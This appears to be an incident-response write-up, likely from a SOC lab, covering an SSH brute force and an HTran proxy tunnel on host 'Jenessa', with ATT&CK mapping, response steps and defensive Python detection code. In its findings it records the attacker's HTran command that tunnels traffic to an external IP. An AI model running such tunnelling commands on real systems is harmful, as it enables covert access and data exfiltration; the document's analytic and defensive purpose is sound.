MITRE ATT&CK Techniques
T1021 Remote Services
T1110 Brute Force
T1090 Proxy
T1572 Protocol Tunneling
Findings
Attacker IP 87.249.134.130 gained access via SSH brute force
Compromised account: analyst, on host Jenessa (172.16.17.131)
External proxy endpoint 218.27.4.98 was used for tunneling
The HTran proxy tool was executed to create a network tunnel from the internal host to the external malicious IP
Command used: ./HTran -slave 218.27.4.98 4444 18.189.13.47 80
The tool was compiled on the endpoint and used for proxying traffic
No additional lateral movement or connections observed beyond the tunnel
Initial access occurred shortly before Oct 08 2024 08:26 AM via SSH brute force
HTran execution detected at Oct 08 2024 08:26 AM
Affected host: Jenessa (172.16.17.131)
Inbound attack from 87.249.134.130
Outbound tunnel established to 218.27.4.98 over port 4444
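As an added detection example (not part of the original investigation notes), the following Python flags the two behaviours recorded above from constructed sample data: an SSH login from a source that had just failed repeatedly, and an HTran slave-mode command line parsed into its connect and relay endpoints. The log lines and PIDs are constructed; the argument layout of HTran's -slave mode (connect host and port, then relay host and port) follows the tool's own usage text.

```python
import re
from datetime import datetime, timedelta

# Constructed sshd log lines modelled on the incident (not real log data).
AUTH_LOG = """\
Oct  8 08:20:01 Jenessa sshd[2201]: Failed password for analyst from 87.249.134.130 port 51022 ssh2
Oct  8 08:20:03 Jenessa sshd[2203]: Failed password for analyst from 87.249.134.130 port 51024 ssh2
Oct  8 08:20:05 Jenessa sshd[2205]: Failed password for analyst from 87.249.134.130 port 51026 ssh2
Oct  8 08:20:07 Jenessa sshd[2207]: Failed password for analyst from 87.249.134.130 port 51028 ssh2
Oct  8 08:20:09 Jenessa sshd[2209]: Accepted password for analyst from 87.249.134.130 port 51030 ssh2
Oct  8 08:21:00 Jenessa sshd[2300]: Accepted publickey for backup from 172.16.17.10 port 40000 ssh2
"""

SSHD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) \w+ for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port"
)

def detect_ssh_brute_force(log_text, year=2024, threshold=3, window_min=5):
    """Flag a successful SSH login preceded by at least `threshold` failures
    from the same source IP within `window_min` minutes."""
    failures = {}   # source IP -> timestamps of failed logins
    findings = []
    for line in log_text.splitlines():
        m = SSHD_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip = m["ip"]
        if m["result"] == "Failed":
            failures.setdefault(ip, []).append(ts)
            continue
        recent = [t for t in failures.get(ip, []) if ts - t <= timedelta(minutes=window_min)]
        if len(recent) >= threshold:
            findings.append({"ip": ip, "user": m["user"], "failures": len(recent), "at": ts})
    return findings

# HTran slave mode: -slave <connect_host> <connect_port> <relay_host> <relay_port>
HTRAN_SLAVE_RE = re.compile(r"(?:^|\s)-slave\s+(\S+)\s+(\d+)\s+(\S+)\s+(\d+)")

def detect_htran_slave(cmdline):
    """Return the outbound connect target and relay target of an HTran slave
    command line, or None if the command line does not match."""
    m = HTRAN_SLAVE_RE.search(cmdline)
    if not m:
        return None
    return {"connect_to": (m[1], int(m[2])), "relay_to": (m[3], int(m[4]))}
```

Running both detections over the constructed log and the command line recorded above yields one brute-force finding for 87.249.134.130 and a tunnel to 218.27.4.98:4444 relaying to 18.189.13.47:80.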
Summary
Investigation confirmed a true positive alert. The attacker gained access through a successful SSH brute force against the analyst account. The HTran tool was then deployed and executed to establish a proxy tunnel to a known malicious IP. No evidence of further persistence or lateral movement was identified.
Response Actions
Removed HTran tool from endpoint
Verified no active malicious processes running
Reset analyst account password
Removed analyst account from sudo group
Confirmed no additional suspicious network activity
Endpoint contained successfully
References
https://www.abuseipdb.com/check/87.249.134.130
https://www.abuseipdb.com/check/218.27.4.98
https://github.com/HiwinCN/HTran
https://www.virustotal.com/gui/file/34d99b639c4660206a8d034ba52cf6e008ca21abd410f952d24231adb40f49f2/details